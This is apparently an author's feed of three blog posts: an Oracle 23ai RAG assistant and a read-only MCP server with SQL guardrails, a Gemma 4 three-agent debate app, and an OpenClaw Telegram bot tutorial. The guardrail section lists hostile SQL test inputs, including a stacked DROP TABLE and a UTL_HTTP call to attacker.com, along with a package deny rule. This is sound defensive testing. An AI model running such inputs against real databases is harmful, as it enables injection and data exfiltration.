DEV Community: Ranjith Kumar Kondoju

An Oracle DBA builds AI: shipping Oracle 23ai RAG and an MCP server in a weekend

Ranjith Kumar Kondoju — Wed, 13 May 2026 22:07:38 +0000

I asked Claude to 'DROP TABLE' on my Oracle database.

It tried. The guardrails refused. The audit log captured it.

That's the demo screenshot at the top of mcp-oracle-dba, one of two open-source repos I shipped this weekend as an Oracle Apps DBA learning AI infrastructure. The other is oracle-ebs-rag — a retrieval-augmented chat assistant over Oracle E-Business Suite resolution notes, running on Oracle Database 23ai's native vector search.

Both repos are MIT-licensed. Datasets are fully synthetic.

This post is about what I learned. Not the tutorial-level "here's how to call an embedding API" stuff — the actual production-shaped lessons that took an hour of head-scratching each. If you're an Oracle DBA watching AI from the sidelines, my hope is this post saves you those hours.

Why an Oracle DBA, of all people

The 2026 narrative is "AI is replacing DBAs." Look at any tech-jobs Twitter thread and you'll find it.

The reality I've found is closer to "DBAs who can ship AI infrastructure replace DBAs who can't." Production AI is mostly infrastructure: connection pooling, statement timeouts, audit logs, schema allowlists, PII redaction, prompt caching, cost monitoring. Every one of those is something DBAs already think about daily. It's not ML research.

I'm an Oracle Apps DBA. Day job is running production Oracle E-Business Suite R12.2 — upgrades, cloning, patching, adop troubleshooting, performance tuning, plus database administration on Oracle 19c. Ansible for automation. OCI for cloud. Standard stack.

What surprised me about building AI infrastructure: my Oracle skills transferred more cleanly than I expected. The new piece is small compared to the production-engineering scaffolding around it.

Here's the proof, then the lessons.

What I built

Talk to EBS — RAG over Oracle E-Business Suite

A chat interface where I ask plain-English questions about EBS production scenarios and the system responds with grounded answers and inline citations to the source notes.

The stack:

Oracle Database 23ai Free in Docker (via OrbStack on Apple Silicon). Native VECTOR(1024, FLOAT32) datatype, VECTOR_DISTANCE function with cosine similarity. No external vector database. No Pinecone, no Weaviate, no Milvus.
Cohere embed-english-v3.0 for embeddings (1024 dimensions, free tier is generous).
Claude Sonnet with prompt caching for grounded generation.
Streamlit chat UI with streaming responses, citations panel, and a sidebar that tracks live cost and prompt-cache hit rate.
uv for Python project management.

The dataset is 3 synthetic resolution notes covering concurrent-manager troubleshooting, workflow mailer issues, and adop patching failures. Each note has YAML frontmatter and is split on Markdown H2 headings (Symptom / Diagnosis / Root cause / Resolution) into 5–6 chunks. That's about 17 chunks total in the vector store.

Eval harness with Claude Haiku as judge over a 10-question golden set. Current baseline:

Metric	Result
Retrieval recall @ 6	100 %
Must-contain pass	100 %
Must-not-contain pass	100 %
Claude Haiku judge avg	4.80 / 5

CI regression gate in .github/workflows/eval.yml fails the build on >5 percentage-point drop on any metric. Zero tolerance on must_not_contain (forbidden-claim violations).

mcp-oracle-dba — A Model Context Protocol server for Oracle

This one is the more unusual project. MCP is a protocol Anthropic released that lets any compatible client (Claude Desktop, Claude Code, Cursor) plug in tools written in any language. Most "let your LLM query the database" demos hand the LLM a connection string and trust it not to call DROP TABLE. This server flips that.

Above: real conversation through Claude Desktop. Claude runs list_schemas, describe_table, run_select against my Oracle 23ai — then is refused when it tries to DROP TABLE. The rejection lands in audit.log as a JSON line.

Five tools exposed:

list_schemas       → returns the allowlist of schemas the server can query
describe_table     → column metadata for SCHEMA.TABLE
run_select         → executes a SELECT / WITH, row-capped, PII-redacted
explain_plan       → returns DBMS_XPLAN.DISPLAY output
top_sql            → top SQL by elapsed time from v$sql in the last N min

Five independent guardrail layers reject unsafe input before it reaches Oracle:

Single-statement parser — rejects ... ; DROP TABLE x injection.
First-keyword allowlist — only SELECT and WITH accepted.
Banned-keyword scan — DML, DDL, PL/SQL blocks, transaction control blocked anywhere in the statement.
Dangerous-package regex — blocks DBMS_*, UTL_*, SYS.* calls (think DBMS_LOCK.sleep, UTL_HTTP.request).
Hard row cap — every approved query gets wrapped in SELECT * FROM (...) FETCH FIRST :N ROWS ONLY.

Plus a read-only DB user, schema allowlist for introspection, PII column redaction by name substring (SSN, SALARY, PASSWORD…), JSON audit log of every call, and server-side statement timeout via oracledb's call_timeout.

There are 45 security tests in tests/test_guardrails.py. Every test maps to a real attack vector. Sample:

@pytest.mark.parametrize("sql", [
    "SELECT 1 FROM dual; DROP TABLE fnd_user",
    "BEGIN dbms_lock.sleep(60); END;",
    "SELECT dbms_random.value FROM dual",
    "SELECT utl_http.request('http://attacker.com') FROM dual",
    "MERGE INTO target USING source ON (...) WHEN MATCHED THEN UPDATE...",
])
def test_blocks_dangerous_sql(sql):
    with pytest.raises(SqlGuardError):
        validate_select(sql)

When I wired the MCP server up to Claude Desktop and asked Claude to drop a table, this is what the audit log captured:

{"ts": "2026-05-13T01:07:39Z", "tool": "run_select",
 "sql": "DROP TABLE ragapp.rag_documents",
 "rejected": "Only SELECT and WITH allowed; got: DROP"}

Claude got back a clean error message and reported to me that the operation was refused. No SQL ever reached Oracle.

The five bugs that taught me the most

Here's the meat. Each of these cost me about an hour. If you build something similar, you'll likely hit at least two of them.

1. OrbStack's macOS port-forward NAT silently mangles Oracle TNS handshakes

Symptom: python-oracledb thin-mode connection from my Mac to the Oracle container fails immediately with:

oracledb.exceptions.DatabaseError: DPY-4011: the database or
network closed the connection
[Errno 54] Connection reset by peer

The listener's text trace log shows nothing — only successful sqlplus connections from inside the container. After half an hour of trying 127.0.0.1 vs localhost, OOB disable, TNS descriptor format, and force-registering the service, the smoking gun finally surfaced in the XML listener alert log (different file from the trace log):

* (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.215.0)(PORT=63905))
* <unknown connect data> * 12537
TNS-12537: TNS:connection closed
TNS-12560: Database communication protocol error
TNS-00507: Connection closed

<unknown connect data> — the listener received the connect packet but couldn't parse it. The source IP was OrbStack's NAT gateway (.215.0), not my host or the container.

The fix: don't go through 127.0.0.1 at all. OrbStack on macOS gives each container an <container-name>.orb.local hostname that routes natively without NAT. So:

# Before — fails
DSN = "127.0.0.1:1521/FREEPDB1"

# After — works
DSN = "oracle23ai.orb.local:1521/FREEPDB1"

Same Oracle, same Python, same code path. Different DNS path. Connection succeeds.

This is documented exactly zero places I could find. Filed it under "things you only learn by hitting them."

2. Sandboxed macOS apps can't resolve `*.orb.local`

This bit me a second time, an hour later. After getting my terminal scripts to work with oracle23ai.orb.local, I wired the MCP server into Claude Desktop and watched list_schemas succeed but run_select fail with the same No route to host error.

Why? Claude Desktop is a sandboxed macOS app. When it spawns the MCP server as a child process, that child process inherits the sandbox — and the sandbox doesn't have access to OrbStack's DNS resolver. So oracle23ai.orb.local doesn't resolve.

The fix: use the container's direct IP, which routes through normal kernel networking:

CONTAINER_IP=$(docker inspect oracle23ai \
  --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}')
# Then: ORA_DSN=$CONTAINER_IP:1521/FREEPDB1

The IP can change on container recreate, but it's stable across restarts. For a dev tool, that's a fair trade.

This one is now in the README's troubleshooting section. I expect every Mac user who wires up an MCP server with a Dockerised Oracle to hit this.

3. `SELECT_CATALOG_ROLE` replaces three explicit V$ grants

My first cut of the read-only user setup had this:

CREATE USER mcp_ro IDENTIFIED BY "...";
GRANT CREATE SESSION TO mcp_ro;
GRANT SELECT ON v_$sql       TO mcp_ro;  -- fails
GRANT SELECT ON v_$session   TO mcp_ro;  -- fails
GRANT SELECT ON v_$pdbs      TO mcp_ro;  -- fails

Three ORA-00942: table or view does not exist errors. The V_$ views are owned by SYS. SYSTEM has the DBA role and can read them, but to grant them onward you need to be SYS or have explicit WITH GRANT OPTION. None of those things are true by default.

The fix:

GRANT SELECT_CATALOG_ROLE TO mcp_ro;

That one role covers every V$ and DBA_* view in the dictionary, in one line. It's the right answer for any service that needs to introspect Oracle. No SYS-grantor problem.

Bonus: the same script also tried GRANT CREATE INDEX TO ragapp — which fails because CREATE INDEX isn't a system privilege for tables you own; it's implicit with CREATE TABLE. Common muscle-memory error from PostgreSQL or MySQL.

4. sqlparse tags CTE statements as `Keyword.CTE`, not `DML`

My SQL guardrail had this strict check:

from sqlparse.tokens import DML

first_token = next((t for t in stmt.tokens if not t.is_whitespace), None)
if first_token.ttype is not DML or first_token.value.upper() not in {"SELECT", "WITH"}:
    raise SqlGuardError("Only SELECT and WITH allowed")

The unit test I'd written deliberately included WITH t AS (SELECT 1 FROM dual) SELECT * FROM t to make sure CTEs would pass. It failed on the first run.

Reason: sqlparse classifies WITH as Token.Keyword.CTE (a subtype of Keyword), not Token.Keyword.DML. My type check rejected it.

The fix: stop relying on token type for the first-keyword check and lean on the other guardrails:

first_val = first_token.value.upper().strip()
if first_val not in {"SELECT", "WITH"}:
    raise SqlGuardError(...)

The banned-keyword scan and dangerous-package regex handle the rest. Multi-layer defence means the first-keyword check doesn't need to be perfect at token-type discrimination — it just needs to recognise legitimate SQL starters.

What I like about this one: the test caught the bug in seconds. I didn't have to discover it in production with a real CTE-using user. That's the value of a guardrail test suite.

5. Prompt caching doesn't help on first turns. Only follow-ups.

I'd read about Anthropic's prompt caching dropping costs ~85 % and assumed I'd see that immediately. First eval run, all ten questions: cache_read_input_tokens: 0 across the board. Cost was $0.10 for the run.

What I missed: each question retrieves a different set of context chunks. The cached prefix (system prompt + retrieved context) is different per question, so every first turn writes to the cache, none read from it.

Where caching actually fires is multi-turn follow-ups on the same retrieval. Ask "concurrent request stuck — what do I check?" then "what about OPP memory pressure?" → the second turn reuses the same retrieved context → cache hit, ~85 % cost drop on the cached portion.

I added a sidebar widget to the Streamlit UI that tracks the live cache hit rate. Now I can see the cache working when I ask follow-ups in the same chat. Without that visibility I'd have assumed it wasn't working.

The Anthropic docs are clear about this; I just didn't read carefully enough. The lesson: instrument cost and cache metrics from day one, not as a later optimisation.

What the numbers look like in practice

Per question over the 10-question golden eval:

Input tokens: ~900–1,500
Output tokens: ~400–600
Cost on Claude Sonnet: ~$0.01 per question
On follow-ups with cache hit: ~$0.002 per question
Retrieval latency (brute-force VECTOR_DISTANCE on 17 chunks): under 50 ms

The HNSW vector index is intentionally deferred. Oracle 23ai's HNSW needs vector_memory_size > 0 which requires a database restart. For 17 chunks, brute force is so fast that adding HNSW would be premature optimisation. It's a future blog post — "before/after benchmark when the corpus grows to 10,000 chunks."

What I'd do differently if I started over

A few honest self-critiques after sitting with the result for a day:

More synthetic notes from the start. Three is enough to prove the pipeline, but for eval-driven iteration you really want 15–20. I'll grow the dataset over the next few weekends.
Hybrid retrieval would have been worth the day. Pure vector search has a known weakness: it doesn't always rank obvious keyword matches first. Adding Oracle Text BM25 in parallel and ranking on a combined score is a 20 % retrieval recall improvement on most datasets. Will be the next thing I build.
The MCP server should have AWR/ASH tools from day one. The whole point of an Oracle MCP server is to let an LLM read production diagnostics. Top SQL is in there now; AWR snapshot summary, ASH wait-event histogram, and DB time-model breakdown all belong in the next release.
CI should run the eval on every PR, not just locally. It does now — added .github/workflows/eval.yml — but the secrets aren't configured yet so it'll fail on first PR until I add them. Tomorrow problem.

The DBA-to-AI take-away

If you're an Oracle DBA reading this, three points to leave you with:

The vector database you might be evaluating in 2026 is already in Oracle. Native VECTOR datatype since 23ai (released 2024). If your shop runs Oracle, your data is already where the embeddings should live. Single SQL surface, single security model, single backup story.
Production-AI is mostly the production part. Connection pooling, statement timeouts, audit logs, schema allowlists, PII redaction, prompt caching — these are day-one DBA instincts. Most AI tutorials are written by people who haven't carried a pager and it shows.
Pick a real workload and embed an LLM next to it. Don't try to compete with ML researchers. The leverage for DBAs is using AI to make existing data more accessible. A RAG assistant over your team's existing runbooks is a higher-ROI weekend project than learning PyTorch.

The job market in 2026 isn't "DBA versus AI engineer." It's "DBA who can ship AI infrastructure versus everyone else." The data depth is the moat. The AI piece sits on top.

Repos and links

Talk to EBS (RAG demo): github.com/shopsmartai/oracle-ebs-rag
mcp-oracle-dba (MCP server): github.com/shopsmartai/mcp-oracle-dba

Both MIT-licensed. Dataset is fully synthetic. If you're an Oracle person working on similar things, my DMs are open — happy to compare notes. If you're a recruiter working on senior roles in AI / data infrastructure or Oracle + cloud automation, also happy to chat.

Feedback on the post welcome in the comments.

I Built an AI That Argues With Itself About Anything

Ranjith Kumar Kondoju — Sat, 09 May 2026 05:48:31 +0000

This is a submission for the Gemma 4 Challenge: Build with Gemma 4

What I Built

AgentMesh is a thinking partner that argues with itself. Ask it any opinionated question and three Gemma 4 agents take different stances on it: a skeptic finds the strongest counter-arguments, an advocate makes the strongest case in favor, and a pragmatist describes how it actually plays out in practice. Each agent searches Wikipedia and Hacker News comments in parallel for evidence, then a synthesizer shows you where the three agreed, where they disagreed, and reconciles them.

It solves a real problem: single-shot LLMs collapse to one voice. Ask ChatGPT or Gemini "Is the AI bubble about to burst?" and you get a balanced-sounding answer that hides the actual disagreement. The model is averaging perspectives behind the scenes. AgentMesh forces the disagreement to surface, with three agents each holding a fixed stance and a synthesizer that calls out where they parted ways. You see the argument, not just the conclusion.

The whole thing runs in the browser with zero servers contacted by us. Two ways to run it:

Local: Gemma 4 E2B on your GPU via WebGPU + Transformers.js. ~3 GB first download, then cached. Total privacy: nothing leaves the tab.
Cloud (BYOK): Bring your own free Google AI Studio key. Calls go from your browser directly to Gemini API, never through any backend of mine. ~30 seconds per query.

Demo

Live: https://shopsmartai.github.io/agentmesh/
Demo Video: https://shopsmartai.github.io/agentmesh/assets/agentmesh-demo.gif

Open in any modern browser (Chrome 113+ for local mode; any modern browser for cloud mode). The Settings panel has a radio toggle to pick local or cloud. Try one of the suggestion buttons (Tesla in 2026, AI bubble?, Buy a house?) or type your own opinionated question.

Code

Repo: https://github.com/shopsmartai/agentmesh

MIT licensed, vanilla JavaScript with no build step. The interesting files:

js/agents.js — planner / perspective workers (skeptic, advocate, pragmatist) / synthesizer + multi-source gather
js/model.js — routes model.chat() to the local Web Worker or the Gemini API; cloud adapter with retry-with-backoff, timeout, fallback chain, thinking-mode stripping
js/model.worker.js — the local model life cycle: load, warmup, streaming chat, throttled progress
js/tools.js — Wikipedia, Hacker News stories + comments, DuckDuckGo, arXiv (CORS-friendly, no keys)
coi-serviceworker.js — COOP/COEP header injector so SharedArrayBuffer works on GitHub Pages

How I Used Gemma 4

I used two Gemma 4 sizes to power the same architecture at two scales:

Gemma 4 E2B for local, in-browser inference. ~3.1 GB at q4f16, runs in a Web Worker via Transformers.js + ONNX Runtime + WebGPU.
Gemma 4 E4B (gemma-4-26b-a4b-it) for cloud inference. 26B total params with 4B active (Mixture-of-Experts), hosted on Google AI Studio. Falls back to 31B Dense (gemma-4-31b-it) if E4B has a transient issue.

Same model family, two scales, so the local and cloud paths produce comparable shape of answers. Pick your trade-off: privacy + slow (local) or speed + bigger model (cloud).

Why Gemma 4 specifically. Multi-perspective agents only work if the model has three properties at once, and Gemma 4 ships all three:

Strong instruction following. The skeptic must actually argue against the topic. The advocate must actually argue for it. Smaller models drift, hedge, or write balanced summaries that ignore their assigned stance. I tested SmolLM2-360M as a control and it cannot stay in role: tell it "you are the skeptic" and it writes a balanced paragraph anyway. Gemma 4 stays sharp across all three perspectives. The roles do not blur.
Refuses to invent facts when notes are thin. Workers anchor in research notes when they support the stance, and use general training knowledge to fill gaps when notes are weak. They are honest about which claims have evidence vs which are widely-held belief. The hallucination resistance is what makes the disagreement trustworthy rather than theatrical.
Browser to server, one architecture. E2B at q4f16 is small enough to fit in a Chrome tab alongside the ONNX runtime and a streaming UI. E4B and 31B Dense are server-class and Google hosts them on AI Studio for free with a personal API key. So the local and cloud paths use the same model family with no architectural rework.

E2B and the larger variants both expose a 128K context window. I am not using all of it yet, but the headroom means future versions can feed full documents to the perspective agents instead of search snippets.

The rest of this post is the engineering writeup. There is more of it than I expected when I started.

Why three agents instead of one

Try this in your head. Ask any chat model "Is buying a Tesla a good investment in 2026?" You will get a balanced essay. The model will give you one paragraph for each side and a polite ending. It is fine. It is also boring. It is hiding what the model actually thinks each side's strongest argument is.

A multi-agent system can do something a single call cannot. You give each agent a fixed role and a separate context. The skeptic does not get to soften its view by also writing the advocate's paragraph. The advocate does not get to hedge. They have to commit. Only then do you reconcile.

This is the only architecture I know of where the multi-agent shape gives a concrete win that single-call inference cannot match. It is not "five agents read the same Wikipedia article and produce variants." It is three agents holding three positions and a synthesizer showing the gap.

The architecture also makes the answer better in a small way that matters. Each agent searches Wikipedia AND Hacker News comments in parallel for evidence supporting its stance. Wikipedia gives encyclopedic facts. HN comments give substantive user opinions and lived experience. Workers see both, anchor in the parts that support their stance, and ground their argument in real material rather than hallucinating.

The two modes (more detail)

Local mode runs Gemma 4 E2B on your GPU. First page load downloads about 3.1 GB of weights into the browser cache. After that, reload is instant. Inference takes 3 to 5 minutes per query on a consumer GPU because WebGPU LLM inference is single-stream and we have five sequential model calls per swarm. Privacy is total: nothing leaves the tab once weights are cached.

Cloud mode runs Gemma 4 E4B (gemma-4-26b-a4b-it) on Google's servers via the Gemini API. You bring your own free key from aistudio.google.com/app/apikey. The key lives only in your browser's localStorage; it is never embedded in the public code, never transmitted to anyone except Google. Inference takes 20 to 40 seconds per query. The privacy story shifts: queries go through Google.

You pick. The Settings panel has a radio toggle and a key input. The header tells you which mode is active.

The eight engineering problems

Naming the problems is the actual point of this post because most of them are reusable knowledge for anyone trying to ship browser-LLM apps.

1. The page was not cross-origin isolated

GitHub Pages does not let you set custom HTTP headers. Without two specific headers (Cross-Origin-Opener-Policy: same-origin and Cross-Origin-Embedder-Policy: credentialless), the browser will not enable SharedArrayBuffer. The ONNX runtime needs SharedArrayBuffer to run on WebGPU. Without it, every model load failed with raw numeric errors that pointed into the WebAssembly heap (literal numbers like 11514632).

Fix: ship a service worker (adapted from coi-serviceworker, MIT) that intercepts every response and adds the missing headers. First load registers the worker and reloads. After that, the page is cross-origin isolated and SharedArrayBuffer becomes available.

2. WebGPU compile froze the tab for a minute

The first time the ONNX runtime loads a model on WebGPU, it has to compile shaders for every operation in the network. For Gemma 4 E2B that takes anywhere from thirty seconds to over a minute. Done on the main thread, the page becomes unresponsive.

Fix: put the entire model life cycle in a Web Worker. The page sees a thin proxy that exposes model.load(onProgress) and model.chat(messages, opts). The proxy talks to the worker over postMessage. Heavy work happens off the main thread; the page stays interactive.

3. The worker flooded the main thread anyway

After moving the model into the worker, the page froze again for a different reason. Transformers.js fires a progress callback for every chunk of the download. With a 1.5 GB file, that is hundreds of events per second. Each one became a postMessage to the main thread. The main thread message queue saturated.

Fix: throttle progress messages to one every 100 milliseconds. Always send state changes immediately (started, finished, ready) but coalesce the actual progress percentages.

4. Wikipedia search returned nothing for verbose questions

Pressure-testing the live site exposed a fundamental issue. Even simple queries like "What is photosynthesis?" were producing answers like "research notes are empty." Two of three workers were giving up.

The bug was upstream. The model-driven planner was generating verbose sub-questions like "What is the fundamental definition of photosynthesis and its core chemical processes?" Wikipedia's classic search API does title-prefix matching, and that string is not the prefix of any Wikipedia article title.

Fix in three parts. Switch to Wikipedia's full-text search API. Strip filler words from the search query before sending it (a list of about 60 question-shape filler words). Add a relevance gate: if no result title contains a meaningful word from the query, treat it as zero results and cascade to a different source.

5. The planner was spending 30 seconds on something a regex could do

The original planner used the model itself to extract the topic and generate three search queries. It took about 30 seconds on Gemma 4. Then I noticed the model was just echoing the user's full question into the template. It was not actually doing extraction. It was a slow templating engine.

Fix: replace the planner's model call with a small JavaScript function. Strip leading question words and trailing punctuation. Strip "X better than Y" comparisons to keep just X. Cap at 3 words. Done in milliseconds. The planner card still appears in the swarm visualization; it just shows the topic immediately rather than streaming through 30 seconds of model generation.

6. Wikipedia gave facts but no opinions

For opinion questions ("Is remote work better than in-office work?"), Wikipedia gave the encyclopedic article on remote work, which is descriptive, not opinionated. Workers correctly noticed they could not construct a real critique from descriptive material and refused.

Fix: search multiple sources in parallel. For every worker query, fetch Wikipedia AND Hacker News comments at the same time. Wikipedia provides encyclopedic grounding. HN comments provide actual user opinions and lived experience, with paragraphs of real takes that no encyclopedia has. Workers see both and decide what to anchor on. The "0 servers contacted" line in the footer lost its third significant digit but the architecture finally produces grounded opinion content.

7. Cloud mode was the next thing the project needed

Local Gemma 4 E2B at 3 to 5 minutes per query is real and unavoidable on consumer GPUs. The architecture only worked at "single user with patience" volume. Adding a cloud option mattered because it lets the same architecture run at 30 seconds per query on bigger Gemma 4 variants.

The challenge was doing it without compromising the privacy story for users who care about it. Solution: BYOK. The Settings panel has a key input that writes only to localStorage. The public code contains no key (verified with git grep for AIza patterns before every push). The cloud path makes one fetch per agent call directly to generativelanguage.googleapis.com from the user's browser. We never see the key, never proxy the requests, never log anything.

The cloud adapter has a 60-second per-call timeout (we observed one worker hang indefinitely while the other two completed) and a two-stage resilience strategy. First, each model gets up to three attempts with 1s/2s exponential backoff if the API returns a 5xx, a 429, an empty body, or a timeout. Google's "Internal error encountered" on Gemma 4 is almost always transient and clears within one retry. Second, if a model still fails after retries, we fall through to the other Gemma 4 variant in the chain (E4B and 31B Dense). Hard errors like 404 (model not on your key) skip straight to the next variant; auth and bad-request errors bail immediately.

8. Gemma 4 dumps its thinking into the response

Even with thinkingConfig.thinkingBudget=0 (which the API rejects for Gemma 4 with a 400, by the way), Gemma 4 on the Gemini API outputs its internal reasoning verbatim: drafts, refinement passes, "Word count check" notes, before the actual final answer. The user's first cloud query produced about 600 words of thinking-out-loud before the clean structured answer.

Fix: client-side stripping. The synthesizer's output always starts with ## Where they agreed. Find the LAST occurrence of that heading, trim everything before it. Strip leading "Final Polish:" / "Refined version:" labels. The model's thinking goes in the bin; the user sees only the polished output.

What I want to be honest about

A few things people might assume from the demo that are not actually true.

Local mode is sequential, not parallel. WebGPU LLM inference is single-stream per session. The three perspective agents take turns on one GPU. The visualization makes it look concurrent. Logically it is, physically it is not. Cloud mode actually fires three parallel Gemini calls but the synthesizer still waits for all three.

Cloud mode is private to Google, not to me. Your queries go to Google's servers. Your key goes from your browser directly to Google. I never see either. But this is different from the local mode promise of "nothing leaves your tab." Both are valid trade-offs; you pick.

Niche cross-domain queries return weak findings. When the public sources do not have an opinion to mine, the agents lean on training knowledge alone. They are honest about which claims have evidence versus widely-held belief.

The 3 GB local-mode download is real. No way around it for first-time local visitors. We gate the download behind an explicit click and persist via the browser cache so reload is free. Cloud mode is the alternative for visitors who do not want to commit.

Factual lookup queries do not benefit from this architecture. If you ask "What is photosynthesis?" the skeptic does not really argue against photosynthesis. Three perspective agents on a factual lookup just produce three slightly different summaries of the same article. AgentMesh shines on questions with actual disagreement.

What I would build next

If I keep working on this past the challenge, four things in priority order.

Native Gemma 4 tool calling. The model has a structured tool-call format built into its chat template. Right now I use a deterministic dispatch (Wikipedia + HN comments in parallel). Switching to the native format would make tool selection cleaner and add another concrete reason the project specifically uses Gemma 4.

Multimodal, properly. Gemma 4 E2B is multimodal. The code paths for image input exist in model.worker.js but I rolled them back because per-component dtype configuration on diverse Chrome drivers needed more debugging than the challenge time-box allowed. Drop an image into the prompt. The skeptic argues against what is in it. The advocate argues for. The pragmatist describes how it gets used.

More than three perspectives. A historical agent (how did this work in the past?). A futurist agent (where is this going?). A user-of-the-thing agent. The architecture trivially extends.

More sources. Reddit JSON, Brave Search (would need a second BYOK key), Stack Exchange. Each broadens the grounding for opinionated queries.

I am not committing to any of these yet. What I do next depends on what happens with this post. If a hospital CTO emails me about clinical literature review with locally-bound data, I will go faster on something like a persistent OPFS notebook. If five engineers fork the repo, I will go faster on multimodal and tool-calling. If neither, this stays a portfolio piece I am happy with.

Thanks

To Google DeepMind for releasing Gemma 4 with weights small enough to actually fit in a browser tab AND making the bigger variants available on AI Studio for free, so the same project can run at two scales. To Hugging Face for Transformers.js, especially the 4.2.0 release that finally worked end to end. To gzuidhof for the coi-serviceworker library, which solved the cross-origin isolation problem in about five minutes once I knew it existed. To nico-martin for publishing the gemma4-browser-extension code, which was my reference for which library version actually loads this model. To everyone who keeps the open browser-ML stack moving forward.

The code is MIT. Fork it. Rip out the parts you want. If you build something better with it, I would love to see what.

How to Turn Any SaaS Into a Telegram Bot in 30 Minutes Using OpenClaw

Ranjith Kumar Kondoju — Sun, 19 Apr 2026 21:52:15 +0000

This is a submission for the DEV OpenClaw Challenge 2026: Wealth of Knowledge

The Problem Every SaaS Founder Has

You built a beautiful web app. Users love it. But friction is real: they have to open the browser, navigate to your site, log in, and then use your product.

What if they could just message you on Telegram?

Last week I gave my meal planning SaaS MealAI a Telegram interface using OpenClaw. It took 30 minutes. No webhook hosting. No bot framework to learn. No custom API glue code.

Here is exactly how I did it, and how you can do the same for any SaaS.

What You Will Build

A Telegram bot that:

Talks in your product's voice (not generic ChatGPT)
Has your product's domain expertise baked in
Responds with branded formatting (emojis, bold, structure)
Can be extended to call your real APIs

Time: 30 minutes
Cost: Free (Docker + OpenAI API credits)
Prerequisites: Basic Docker knowledge, an OpenAI or Anthropic API key

Why OpenClaw?

Before OpenClaw, building a Telegram AI bot meant:

A Node.js backend with grammY or telegraf
A hosted webhook endpoint
Custom prompt management
Session and memory handling
Rate limiting logic
Deployment pipeline

OpenClaw is an MIT licensed AI agent runtime that handles all of this in one binary. It supports 25 plus messaging platforms (Telegram, WhatsApp, Discord, Slack, Signal, iMessage, and more). Your agent works on any of them without code changes.

Think of it as the WordPress of AI agents for messaging.

Step 1: Install Docker (2 min)

On macOS, I recommend OrbStack. It is lighter than Docker Desktop.

brew install --cask orbstack
open -a OrbStack

On Linux or Windows, use Docker Desktop.
Verify it works:

bash
docker --version

Step 2: Pull OpenClaw (2 min)

Create a working directory:

mkdir mealai-concierge && cd mealai-concierge

Pull the pre built image:

bash
docker pull ghcr.io/openclaw/openclaw:latest

Step 3: Create a Telegram Bot (3 min)

Open Telegram, search for @botfather
Send /newbot
Choose a name and username (must end in _bot)
Copy the HTTP API token Your bot URL will be t.me/your_bot_username. ## Step 4: Configure OpenClaw (5 min) Create a docker-compose.yml:

services:
openclaw-gateway:
image: ghcr.io/openclaw/openclaw:latest
environment:
HOME: /home/node
TZ: UTC
volumes:
- ./openclaw-config:/home/node/.openclaw
- ./openclaw-workspace:/home/node/.openclaw/workspace
ports:
- "18789:18789"
- "18790:18790"
init: true
restart: unless-stopped
command:
- node
- dist/index.js
- gateway
- --bind
- lan
- --port
- "18789"

Create openclaw-config/openclaw.json:

json
{
"gateway": {
"mode": "local"
},
"channels": {
"telegram": {
"enabled": true,
"botToken": "YOUR_TELEGRAM_BOT_TOKEN_HERE",
"dmPolicy": "open",
"allowFrom": ["*"]
}
},
"agents": {
"defaults": {
"model": "openai/gpt-4o-mini"
}
}
}

Create openclaw-config/agents/main/agent/auth-profiles.json:

{
"version": 1,
"profiles": {
"openai:default": {
"type": "api_key",
"provider": "openai",
"key": "sk-YOUR_OPENAI_KEY_HERE"
}
}
}

## Step 5: The Secret Sauce, SOUL.md (10 min)
This is where a generic chatbot transforms into your product's voice.
Create openclaw-workspace/SOUL.md:

markdown
SOUL.md MealAI Concierge
You are MealAI Concierge, a friendly AI meal planning assistant.

Your Role
Help busy people answer: "What's for dinner?" and plan their week.

Personality
Warm, conversational, concise
Opinionated about food (no hedging)
Practical over perfect
Real people eat real food
What You Do Best
Suggest meal plans (day or week)
Build grocery lists grouped by store section
Adapt to preferences (vegetarian, budget, high protein, picky kids)
Explain nutrition simply
Recipe quick hits, ingredients plus 5 steps
Response Format
Bold meal names
Sparse emojis (salad, pasta, breakfast)
Under 200 words unless asked for detail
Rules
Never open with "Great question!", just answer
Redirect off topic: "That is outside my kitchen!"
Always end with a follow up: "Want the grocery list?"
Mention usemealai.com for full features
Why SOUL.md is powerful:
OpenClaw injects this at the system prompt level on every conversation. The model always sees these instructions before user messages. This is why the persona stays consistent. It is not fine tuning, it is prompt engineering at the right architectural layer.

Step 6: Start It Up (1 min)

docker compose up -d

Check the logs:

bash
docker compose logs -f openclaw-gateway

You should see:
[telegram] [default] starting provider (@YourBotName_bot)

Step 7: Test It (2 min)

Open Telegram, find your bot, and say:

"Hi, who are you?"
"What is for dinner tonight?"
"I am vegetarian, plan my week" You will see it responds as your product, not as ChatGPT. ## The Magic Revealed Here is what OpenClaw is doing under the hood: User message (Telegram) -> OpenClaw Gateway (long polling Telegram API) -> System prompt assembly:

Your SOUL.md (persona)
Your IDENTITY.md (name, vibe)
Conversation history
->
Routed to OpenAI gpt-4o-mini
->
Response sent back via Telegram API
You never wrote a single line of bot framework code. The entire integration layer is one SOUL.md file.

Next Level Moves

Once the basics work, you can layer on:

Add custom skills (call your real API)

Create an OpenClaw skill that fetches real meal plans from your SaaS database. OpenClaw has a plugin SDK that lets the agent decide when to call your API based on the user's message.

Multi channel in one line

Want the same bot on WhatsApp, Discord, or Signal? Add another entry to channels:


json
"channels": {
"telegram": { "enabled": true, "botToken": "..." },
"discord": { "enabled": true, "botToken": "..." },
"whatsapp": { "enabled": true }
}

One codebase. Every platform.
### Persistent memory
The openclaw-workspace directory is your bot's long term memory. Drop markdown files with user preferences, FAQs, or product knowledge. OpenClaw pulls from them contextually.
### Control UI dashboard
OpenClaw ships with a web dashboard at http://localhost:18789 where you can:
* See every conversation live
* Monitor API costs
* Debug prompts
* Switch models
## What I Learned
1. The prompt IS the product. SOUL.md is not just instructions. It is the difference between a demo and a product people want to use.
2. Messaging beats web apps for AI. Users never open Telegram. It is always open. Your SaaS suddenly has zero friction.
3. Open source AI runtimes are ready. OpenClaw handles production grade concerns (auth, rate limiting, logging, multi channel) out of the box.
4. Docker is enough. No Kubernetes. No serverless. Just docker compose up.
## The Repo
Full working setup (zero secrets included):

  
    
      
      
        shopsmartai
       / 
        mealai-concierge
      
    
    
      AI meal-planning concierge via Telegram. Built with OpenClaw for DEV OpenClaw Challenge 2026.
    
  
  
    


🍳 MealAI Concierge



Your personal AI meal-planning assistant — right in Telegram.


Built with OpenClaw + ShopSmartAI for the DEV OpenClaw Challenge 2026.

Live at: usemealai.com


What it does


Ask "What's for dinner?" in Telegram and get:


📅 Personalized weekly meal plans
🛒 Grocery lists organized by store section
